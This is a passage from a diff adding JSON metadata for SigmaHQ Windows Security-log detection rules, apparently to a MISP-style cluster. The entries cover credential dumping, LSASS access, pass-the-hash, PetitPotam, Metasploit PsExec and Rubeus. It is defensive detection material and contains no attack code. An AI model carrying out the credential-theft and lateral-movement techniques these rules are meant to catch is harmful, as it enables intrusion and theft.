Use Rundll32 - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + 
"creation_date": "2020/10/09", + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the mount of ISO images on an endpoint", + "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "value": "ISO Image Mount", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2021/05/29", + "filename": "win_security_iso_mount.yml", + "author": "Syed Hasan (@syedhasan009)", + "level": 
"medium", + "falsepositive": [ + "Software installation ISO files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "value": "First Time Seen Remote Named Pipe", + "meta": { + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_lm_namedpipe.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", + "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", + "value": "Correct Execution of Nltest.exe", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://attack.mitre.org/software/S0359/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1018", + "attack.t1016" + ], + "creation_date": "2021/10/04", + "filename": "win_security_lolbas_execution_of_nltest.yml", + "author": "Arun Chauhan", + "level": "high", + "falsepositive": [ + "Red team activity", + "Rare legitimate use by an administrator" + ], + "logsource.category": "No established category", + "logsource.product": 
"windows" + } + }, + { + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "value": "LSASS Access from Non System Account", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/06/20", + "filename": "win_security_lsass_access_non_system_account.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", + "value": "Credential Dumping Tools Service Execution - Security", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ], + "creation_date": "2017/03/05", + "filename": "win_security_mal_creddumper.yml", + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that only appear in 
cases of lateral movement, credential dumping, and other suspicious activities.", + "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "value": "Malicious Service Installations", + "meta": { + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2017/03/27", + "filename": "win_security_mal_service_installs.yml", + "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "value": "WCE wceaux.dll Access", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "creation_date": "2017/06/14", + "filename": "win_security_mal_wceaux_dll.yml", + "author": "Thomas Patzke", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Alerts on Metasploit host's authentications on the domain.", + "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", + "value": "Metasploit SMB 
Authentication", + "meta": { + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/05/06", + "filename": "win_security_metasploit_authentication.yml", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "level": "high", + "falsepositive": [ + "Linux hostnames composed of 16 characters." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "value": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "meta": { + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2021/01/21", + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", + "author": "Bartlomiej Czyz, Relativity", + "level": "high", + "falsepositive": [ + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", 
+ "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "critical", + "falsepositive": [ + "Highly unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects NetNTLM downgrade attack", + "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "value": "NetNTLM Downgrade Attack", + "meta": { + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ], + "creation_date": "2018/03/20", + "filename": "win_security_net_ntlm_downgrade.yml", + "author": "Florian Roth, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "value": "Windows Network Access Suspicious desktop.ini Action", + "meta": { + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2021/12/06", + "filename": "win_security_net_share_obj_susp_desktop_ini.yml", + "author": "Tim Shelton (HAWK.IO)", + "level": "medium", + "falsepositive": [ + "Read only access list authority" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/10/25", + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "value": "Denied Access To Remote Desktop", + "meta": { + "refs": [ + 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2020/06/27", + "filename": "win_security_not_allowed_rdp_access.yml", + "author": "Pushkarev Dmitry", + "level": "medium", + "falsepositive": [ + "Valid user was not added to RDP group" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "value": "Successful Overpass the Hash Attempt", + "meta": { + "refs": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" + ], + "creation_date": "2018/02/12", + "filename": "win_security_overpass_the_hash.yml", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "level": "high", + "falsepositive": [ + "Runas command-line tool using /netonly parameter" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "value": "Pass the Hash Activity 2", + "meta": { + "refs": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ], + "creation_date": "2019/06/14", + "filename": "win_security_pass_the_hash_2.yml", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "level": "medium", + "falsepositive": [ + "Administrator activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect PetitPotam coerced authentication activity.", + "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "value": "Possible PetitPotam Coerce Authentication Attempt", + "meta": { + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ], + "creation_date": "2021/09/02", + "filename": "win_security_petitpotam_network_share.yml", + "author": "Mauricio Velazco, Michael Haag", + "level": "high", + "falsepositive": [ + "Unknown. Feedback welcomed." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "value": "PetitPotam Suspicious Kerberos TGT Request", + "meta": { + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ], + "creation_date": "2021/09/02", + "filename": "win_security_petitpotam_susp_tgt_request.yml", + "author": "Mauricio Velazco, Michael Haag", + "level": "high", + "falsepositive": [ + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects DCShadow via create new SPN", + "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "value": "Possible DC Shadow Attack", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1207" + ], + "creation_date": "2019/10/25", + "filename": "win_security_possible_dc_shadow.yml", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "level": "medium", + "falsepositive": [ + "Valid on domain controllers; exclude known DCs" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell script installed as a Service", + "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "value": "PowerShell Scripts Installed as Services - Security", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "win_security_powershell_script_installed_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects access to a protected_storage service over 
the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", + "value": "Protected Storage Service Access", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2019/08/10", + "filename": "win_security_protected_storage_service_access.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "value": "Rare Schtasks Creations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "car.2013-08-001", + "attack.t1053.005" + ], + "creation_date": "2017/03/23", + "filename": "win_security_rare_schtasks_creations.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "uuid": "8400629e-79a9-4737-b387-5db940ab2367", + "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "meta": { + "refs": [ + 
"https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "creation_date": "2019/06/02", + "filename": "win_security_rdp_bluekeep_poc_scanner.yml", + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "RDP login with localhost source address may be a tunnelled login", + "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", + "value": "RDP Login from Localhost", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" + ], + "creation_date": "2019/01/28", + "filename": "win_security_rdp_localhost_login.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "value": "RDP over Reverse SSH Tunnel WFP", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2019/02/16", + "filename": "win_security_rdp_reverse_tunnel.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Programs that connect locally to the RDP port" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", + "value": "Register new Logon Process by Rubeus", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ], + "creation_date": "2019/10/24", + "filename": "win_security_register_new_logon_process_by_rubeus.yml", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "value": "Remote PowerShell Sessions Network Connections (WinRM)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": 
"win_security_remote_powershell_session.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Legitimate use of remote PowerShell execution" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", + "value": "Replay Attack Detected", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_replay_attack_detected.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "value": "Suspicious Computer Account Name Change CVE-2021-42287", + "meta": { + "refs": [ + "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/22", + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", + "author": "Florian Roth", + "level": "high", + 
"falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects handles requested to SAM registry hive", + "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "value": "SAM Registry Hive Handle Request", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" + ], + "creation_date": "2019/08/12", + "filename": "win_security_sam_registry_hive_handle_request.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. 
\\TASKNAME", + "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "value": "Scheduled Task Deletion", + "meta": { + "refs": [ + "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "car.2013-08-001", + "attack.t1053.005" + ], + "creation_date": "2021/01/22", + "filename": "win_security_scheduled_task_deletion.yml", + "author": "David Strassegger, Tim Shelton", + "level": "low", + "falsepositive": [ + "Software installation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-system users failing to get a handle of the SCM database.", + "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "value": "SCM Database Handle Failure", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1010" + ], + "creation_date": "2019/08/12", + "filename": "win_security_scm_database_handle_failure.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-system users performing privileged operation os the SCM database", + "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", + "value": "SCM Database Privileged Operation", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2019/08/15", + "filename": "win_security_scm_database_privileged_operation.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "value": "Remote WMI ActiveScriptEventConsumers", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2020/09/02", + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "SCCM" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "value": "Service Installed By Unusual Client - Security", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", + 
